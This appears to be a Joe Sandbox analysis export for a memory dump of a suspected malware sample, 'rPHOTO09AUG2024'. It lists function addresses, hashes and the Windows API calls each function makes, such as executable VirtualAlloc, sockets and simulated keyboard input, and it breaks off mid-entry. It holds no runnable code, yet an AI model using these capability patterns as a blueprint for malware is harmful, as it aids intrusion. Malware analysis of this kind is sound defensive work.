Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: b64ecb6738db450355f0b235369ee5aaaa6197462a04fd16edc246256dd05121
Instruction ID: b7e2b1d23cfcef7eb0dc4e322e5b754ac21c0c24acc7da1dc311a41f626d038a
Opcode Fuzzy Hash: b64ecb6738db450355f0b235369ee5aaaa6197462a04fd16edc246256dd05121
Instruction Fuzzy Hash: E2D012B9804119EBCB44AB90CC44DFA737CE705301F544592B546D2000F234EB8E9B35

Function 00D976C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d918bd8a6a90871f8eac9e91b6786cffbcb97bfc62810bad854617ad1562e29d
Instruction ID: 3a9e6f4c3e8c422651870102b4a038ad03ddd5714e303050fab5112f78742152
Opcode Fuzzy Hash: d918bd8a6a90871f8eac9e91b6786cffbcb97bfc62810bad854617ad1562e29d
Instruction Fuzzy Hash: 10C15C75A14216EFCF14CF98C884EAEBBB5FF48714B158598E845EB251D730EE81CBA0

Function 00DBE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00DBE3D2
CharLowerBuffW.USER32(?,?), ref: 00DBE415

Part of subcall function 00DBDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00DBDAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00DBE615
_memmove.LIBCMT ref: 00DBE628

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 7348ae9203e63a121dda7c15659112a62f30871bc42321b8206ea6d85d18c65f
Instruction ID: ad6d91a184fc398be3531930133534621423d312dee33b09c45bc13a3f5ef85c
Opcode Fuzzy Hash: 7348ae9203e63a121dda7c15659112a62f30871bc42321b8206ea6d85d18c65f
Instruction Fuzzy Hash: DDC14A71A08311DFC714DF28C4819AABBE4FF88714F18896DF89A9B351D731E945CBA2

Function 00DB83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00DB83D8
CoUninitialize.OLE32 ref: 00DB83E3

Part of subcall function 00D9DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D9DAC5

VariantInit.OLEAUT32(?), ref: 00DB83EE
VariantClear.OLEAUT32(?), ref: 00DB86BF

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: dd874367276dc6e98b59174b4a8e8771a11599548abfa481252d62d86dc35a5c
Instruction ID: 2cacf3eb76019490dc4babdc7b9ffbf5dc690a665df84c5b5f591214de23883c
Opcode Fuzzy Hash: dd874367276dc6e98b59174b4a8e8771a11599548abfa481252d62d86dc35a5c
Instruction Fuzzy Hash: 86A11675204701DFDB10DF25C895A6AB7E9FF88314F184459F99A9B3A1CB30ED04DB62

Function 00D97A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00DD2C7C,?), ref: 00D97C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00DD2C7C,?), ref: 00D97C4A
CLSIDFromProgID.OLE32(?,?,00000000,00DCFB80,000000FF,?,00000000,00000800,00000000,?,00DD2C7C,?), ref: 00D97C6F
_memcmp.LIBCMT ref: 00D97C90

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 01402dc06546b2f027a1c2233f160846629834734ca6480bb602c09c0b720898
Instruction ID: d535c4a66cd9c968e8252be93a32511cf556a27b4e8009cbaa3cdc2a234e759d
Opcode Fuzzy Hash: 01402dc06546b2f027a1c2233f160846629834734ca6480bb602c09c0b720898
Instruction Fuzzy Hash: CA810875A1010AEFCF04DF94C984EEEB7B9FF89315F244198E516AB250DB71AE06CB60

Function 00D96DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D96E04
SysAllocString.OLEAUT32(00000000), ref: 00D96EAD
VariantCopy.OLEAUT32 ref: 00D96EDC
VariantClear.OLEAUT32(?), ref: 00D96F03

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 9a53fc942ce5cab9df5ef85b7bf2870fd58ee746121e21e4357d03ee0a7c48de
Instruction ID: a5f11100d42fd7043026c6df18cc5079397ee1f413739725b4abead08eca413e
Opcode Fuzzy Hash: 9a53fc942ce5cab9df5ef85b7bf2870fd58ee746121e21e4357d03ee0a7c48de
Instruction Fuzzy Hash: CA5181706183029BDF24AF65D895A6AF7F5EF48310F24881FF59ACB291EB70D8409B35

Function 00DC9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0115EE00,?), ref: 00DC9AD2
ScreenToClient.USER32(00000002,00000002), ref: 00DC9B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00DC9B72

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: ec69a1a8ae25b587cc4e782914d3a195cc9f8f9bfd9271286ca7d8632d8aa0d6
Instruction ID: 420bc5746bbcd60d42ac99060f3519f0585583314958cd10f3ffc5e50afb2516
Opcode Fuzzy Hash: ec69a1a8ae25b587cc4e782914d3a195cc9f8f9bfd9271286ca7d8632d8aa0d6
Instruction Fuzzy Hash: 8B512F35A0020AAFCF14DF54D895EAEBBB6FB54320F14815DF8159B290D731AD91CB60

Function 00DB6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00DB6CE4
WSAGetLastError.WSOCK32(00000000), ref: 00DB6CF4

Part of subcall function 00D49997: __itow.LIBCMT ref: 00D499C2
Part of subcall function 00D49997: __swprintf.LIBCMT ref: 00D49A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DB6D58
WSAGetLastError.WSOCK32(00000000), ref: 00DB6D64

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: c5c502c6c70ba85d06d9014a699dd7e8b5db01ebbac95618141354d04d090491
Instruction ID: e4a4dc3ebb1dc07b514da9b1cded2c04daaac990bcb7e37b70f195199d585c16
Opcode Fuzzy Hash: c5c502c6c70ba85d06d9014a699dd7e8b5db01ebbac95618141354d04d090491
Instruction Fuzzy Hash: 97418074740200AFEB20AF24DC97F7A77A5DF44B10F448018FA5A9B3D2DA759D018BB1

Function 00DB672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00DCF910), ref: 00DB67BA
_strlen.LIBCMT ref: 00DB67EC

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 8b9a5aa5cb152e13bd6618fffd5fee36d5b249613d4e5645a2b7064b27cd3f9c
Instruction ID: 04a52e960cc37a8db2034f8ce0a6dfd2cfce3015f6ef9e0ac9210d1089971e22
Opcode Fuzzy Hash: 8b9a5aa5cb152e13bd6618fffd5fee36d5b249613d4e5645a2b7064b27cd3f9c
Instruction Fuzzy Hash: 7D419075A00205ABCB14EBA5DCD5EEEB7A9EF48310F148165F9169B292DB34ED04CB70

Function 00DABA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DABB09
GetLastError.KERNEL32(?,00000000), ref: 00DABB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DABB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DABB80

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: fcf87d1f86eff81a5a4a01831bd11793f2ea24c986f67135c61a15044f5dfd23
Instruction ID: d19ed7f263ca7a30f4bdf4b84c439e79e36fb499579a313fbd8ed761e2f5d0dd
Opcode Fuzzy Hash: fcf87d1f86eff81a5a4a01831bd11793f2ea24c986f67135c61a15044f5dfd23
Instruction Fuzzy Hash: 68410939200611DFCB11EF25C595A5EFBE1EF89320B198499E84A9B762CB74FD01CBB1

Function 00DC8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DC8B4D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 813bbe8512b3897a03e4262d6996ecb19c83f97e4c3e33815726e0483056a5ba
Instruction ID: f0e619718be134031b0c00493a5abf4517b20d466a348affad4890794a5b265f
Opcode Fuzzy Hash: 813bbe8512b3897a03e4262d6996ecb19c83f97e4c3e33815726e0483056a5ba
Instruction Fuzzy Hash: C131B474640306BFEF249B18CC45FA977A6EB05310F68451EFA55D72A0CE31ED50AB71

Function 00DCADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00DCAE1A
GetWindowRect.USER32(?,?), ref: 00DCAE90
PtInRect.USER32(?,?,00DCC304), ref: 00DCAEA0
MessageBeep.USER32(00000000), ref: 00DCAF11

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: ebf9b8ca0d7452f89e75a15869870b24b1cf2b43662d14011374fdaf521018c7
Instruction ID: c6bf0c3d3b96d13a793fb4229f28a8bb7f0a4b632e25475a8f141c4e52b4982b
Opcode Fuzzy Hash: ebf9b8ca0d7452f89e75a15869870b24b1cf2b43662d14011374fdaf521018c7
Instruction Fuzzy Hash: 0E416970A0021A9FCB15CF59C884FA9BBF9FF49344F1881ADF8149B261D731A941CBB2

Function 00DA0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00DA1037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00DA1053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00DA10B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00DA110B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 88ef64eca2485b672c081e42d655a371c5f51684b49e2b89e63768f759952298
Instruction ID: 529164cafaf5f9084b0d97d1a0ffc9863f1a34f272f2c96b7033c29408c019f6
Opcode Fuzzy Hash: 88ef64eca2485b672c081e42d655a371c5f51684b49e2b89e63768f759952298
Instruction Fuzzy Hash: E2312834E44698AEFB308B65CC05BFABBAAAB4A310F0C421AF591921D1C3758DC59779

Function 00DA1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00DA1176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00DA1192
PostMessageW.USER32(00000000,00000101,00000000), ref: 00DA11F1
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00DA1243

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ffd07191c19b771b0d9ec19fd8400e0f493e59bec30e11ca3ae224f6003b6363
Instruction ID: 8af5328247f554b9ce38c07924fa34473eb2aa23f91d0c3e8e510e15de1a1e50
Opcode Fuzzy Hash: ffd07191c19b771b0d9ec19fd8400e0f493e59bec30e11ca3ae224f6003b6363
Instruction Fuzzy Hash: E6312634A40718AEEF208BA58C05BFABBAAAB4B310F08431BF681921D1C37489559775

Function 00D76415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D7644B
__isleadbyte_l.LIBCMT ref: 00D76479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D764A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D764DD

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 05726e2d2a2ab2990b94823d87b488c4689361034c8a295c9ac40c19ee529426
Instruction ID: b08323b8a6cf7784cb0e34103f1d47468f3dac59ef4877b44838ef9470eaa727
Opcode Fuzzy Hash: 05726e2d2a2ab2990b94823d87b488c4689361034c8a295c9ac40c19ee529426
Instruction Fuzzy Hash: 5F31EF31608A4AAFDB218F75CC44BAA7BA5FF40318F198529E858871A0FB31D850DBB0

Function 00DC5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00DC5189

Part of subcall function 00DA387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DA3897
Part of subcall function 00DA387D: GetCurrentThreadId.KERNEL32 ref: 00DA389E
Part of subcall function 00DA387D: AttachThreadInput.USER32(00000000,?,00DA52A7), ref: 00DA38A5

GetCaretPos.USER32(?), ref: 00DC519A
ClientToScreen.USER32(00000000,?), ref: 00DC51D5
GetForegroundWindow.USER32 ref: 00DC51DB

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 3a45f74214cbbb38f5c3985fad24491d132898be2f6dea97abf92ff1fff11a42
Instruction ID: 5b070bdb6d6d6fdc03d22650e0a328b38a673b735567137a184e29ed4783289f
Opcode Fuzzy Hash: 3a45f74214cbbb38f5c3985fad24491d132898be2f6dea97abf92ff1fff11a42
Instruction Fuzzy Hash: 0D31FA71900209AFDB00EFA5C885EEFF7F9EF98300B10406AE415E7241EA75AA45CBB0

Function 00DCC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623

GetCursorPos.USER32(?), ref: 00DCC7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00D7BBFB,?,?,?,?,?), ref: 00DCC7D7
GetCursorPos.USER32(?), ref: 00DCC824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D7BBFB,?,?,?), ref: 00DCC85E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: bb30626d6d76d1b8a7a820f5548da4f506d5533c06e8c9672548a8902b718673
Instruction ID: cdd23181002286cf43ec6605661d9995dadda144280e150fd2fc86cfa971c145
Opcode Fuzzy Hash: bb30626d6d76d1b8a7a820f5548da4f506d5533c06e8c9672548a8902b718673
Instruction Fuzzy Hash: 14317E35610119AFCB15CF59C898FEB7BBAEF49310F484169FA099B2A1C7319D60DBB0

Function 00D60BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00D60BF2

Part of subcall function 00D45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00DA7B20,?,?,00000000), ref: 00D45B8C
Part of subcall function 00D45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00DA7B20,?,?,00000000,?,?), ref: 00D45BB0

_fprintf.LIBCMT ref: 00D60C29
OutputDebugStringW.KERNEL32(?), ref: 00D96331

Part of subcall function 00D64CDA: _flsall.LIBCMT ref: 00D64CF3

__setmode.LIBCMT ref: 00D60C5E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

